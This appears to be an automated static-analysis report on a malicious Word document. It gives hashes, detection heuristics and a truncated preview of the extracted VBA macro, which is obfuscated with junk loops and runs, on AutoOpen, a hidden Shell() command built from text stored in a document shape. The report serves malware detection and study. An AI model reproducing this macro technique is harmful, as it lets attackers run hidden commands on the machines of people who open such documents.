Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2d5caba6f7f04cd2…

MALICIOUS

Office (OLE)

86.6 KB Created: 2018-11-14 12:45:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: dc25b02f3d410bdc34394862da2a2381 SHA-1: 46117432056ecd8918f2c2a01157bf24c84b432e SHA-256: 2d5caba6f7f04cd29245bd72faa63f47964c98ce9c4b995bb7d4a8a134555d0a
242 Risk Score

Heuristics 7

  • ClamAV: Doc.Malware.Generic-6749861-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6749861-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8194 bytes
SHA-256: 676a15f5ca5d107e585e0994a563d10973328cd5953ae5fa06427df42073b6c1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "YMwzAFC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function JhwtqtVUjsX()
Const UAptjJEt = 507391445 - 507391445
   Dim WZmnCBBGa, mIfhziYv, ObBuX, oKvDBUpnZ
    mIfhziYv = Len(aBLOWuA)
    oKvDBUpnZ = ""
    For WZmnCBBGa = 1 To mIfhziYv
        oKvDBUpnZ = oKvDBUpnZ & (42 + ((ObBuX + 19) Mod 90))
        If ObBuX >= 19 And ObBuX <= 54 Then
            oKvDBUpnZ = oKvDBUpnZ & (46 + ((ObBuX + 28) Mod 113))
        Else
            oKvDBUpnZ = oKvDBUpnZ & (ObBuX)
        End If
    Next
OmsQUVfOo = oKvDBUpnZ

   Dim wBzcprfzi, BiPDoVj, nbjaKbsSw, bmGBLfO
    BiPDoVj = Len(VrYIaPRPi)
    bmGBLfO = ""
    For wBzcprfzi = 1 To BiPDoVj
        bmGBLfO = bmGBLfO & (35 + ((nbjaKbsSw + 27) Mod 130))
        If nbjaKbsSw >= 25 And nbjaKbsSw <= 67 Then
            bmGBLfO = bmGBLfO & (26 + ((nbjaKbsSw + 35) Mod 159))
        Else
            bmGBLfO = bmGBLfO & (nbjaKbsSw)
        End If
    Next
QXqVjX = bmGBLfO

   Dim XsYzT, otAsaiBU, vzVOd, sTNDBPqE
    otAsaiBU = Len(HBQTrZrfE)
    sTNDBPqE = ""
    For XsYzT = 1 To otAsaiBU
        sTNDBPqE = sTNDBPqE & (25 + ((vzVOd + 26) Mod 145))
        If vzVOd >= 18 And vzVOd <= 78 Then
            sTNDBPqE = sTNDBPqE & (41 + ((vzVOd + 49) Mod 88))
        Else
            sTNDBPqE = sTNDBPqE & (vzVOd)
        End If
    Next
PuYOIOViY = sTNDBPqE

   Dim FDYTzVFEX, NjiTbpc, QlnDMnhzX, HvmWA
    NjiTbpc = Len(oznzfMwS)
    HvmWA = ""
    For FDYTzVFEX = 1 To NjiTbpc
        HvmWA = HvmWA & (15 + ((QlnDMnhzX + 29) Mod 149))
        If QlnDMnhzX >= 12 And QlnDMnhzX <= 91 Then
            HvmWA = HvmWA & (47 + ((QlnDMnhzX + 14) Mod 173))
        Else
            HvmWA = HvmWA & (QlnDMnhzX)
        End If
    Next
CTYcDCql = HvmWA

WjXuzYck = "" + UwoAkY + cjERRtw + Shapes(tvirT + btsBz + 1 + jimAh + ptGbTfq).TextFrame.ContainingRange + PQdUiOOa + iYrjMk
   Dim LFPSsGL, FphZwz, wfGlc, vFhCwjPFE
    FphZwz = Len(TZimM)
    vFhCwjPFE = ""
    For LFPSsGL = 1 To FphZwz
        vFhCwjPFE = vFhCwjPFE & (47 + ((wfGlc + 10) Mod 99))
        If wfGlc >= 39 And wfGlc <= 76 Then
            vFhCwjPFE = vFhCwjPFE & (29 + ((wfGlc + 45) Mod 133))
        Else
            vFhCwjPFE = vFhCwjPFE & (wfGlc)
        End If
    Next
WFkEdJF = vFhCwjPFE

   Dim XjisRmcD, bQzvT, wdlTrWS, MzKaJw
    bQzvT = Len(uqDzSW)
    MzKaJw = ""
    For XjisRmcD = 1 To bQzvT
        MzKaJw = MzKaJw & (20 + ((wdlTrWS + 15) Mod 140))
        If wdlTrWS >= 28 And wdlTrWS <= 63 Then
            MzKaJw = MzKaJw & (41 + ((wdlTrWS + 12) Mod 54))
        Else
            MzKaJw = MzKaJw & (wdlTrWS)
        End If
    Next
JBbKDuDa = MzKaJw

adMbpzsmdTX = Shell(WjXuzYck + pZQAhQtX + AfNARL, UAptjJEt)
   Dim iHnklGri, FdvTkkCsw, XIUab, zldXinnZV
    FdvTkkCsw = Len(sfFcFb)
    zldXinnZV = ""
    For iHnklGri = 1 To FdvTkkCsw
        zldXinnZV = zldXinnZV & (12 + ((XIUab + 41) Mod 182))
        If XIUab >= 10 And XIUab <= 77 Then
            zldXinnZV = zldXinnZV & (23 + ((XIUab + 17) Mod 117))
        Else
            zldXinnZV = zldXinnZV & (XIUab)
        End If
    Next
GVVOuU = zldXinnZV

   Dim fbtwZZicS, FFzpMikFV, ZikViM, qrknSVO
    FFzpMikFV = Len(VvsArRFw)
    qrknSVO = ""
    For fbtwZZicS = 1 To FFzpMikFV
        qrknSVO = qrknSVO & (37 + ((ZikViM + 25) Mod 168))
        If ZikViM >= 45 And ZikViM <= 84 Then
            qrknSVO = qrknSVO & (17 + ((ZikViM + 34) Mod 198))
        Else
            qrknSVO = qrknSVO & (ZikViM)
        End If
    Next
RzrYNME = qrknSVO

   Dim qJFrzQDRf, ZhThU, dtAzjJEa, CjclzYhz
    ZhThU = Len(XfEzYuwb)
    CjclzYhz = ""
    For qJFrzQDRf = 1 To ZhThU
        CjclzYhz = CjclzYhz & (29 + ((dtAzjJEa + 12) Mod 172))
        If dtAzjJEa >= 19 And dtAzjJEa <= 65 Then
            CjclzYhz = CjclzYhz & (34 + ((dtAzjJEa + 10) Mod 151))
        Else
            
... (truncated)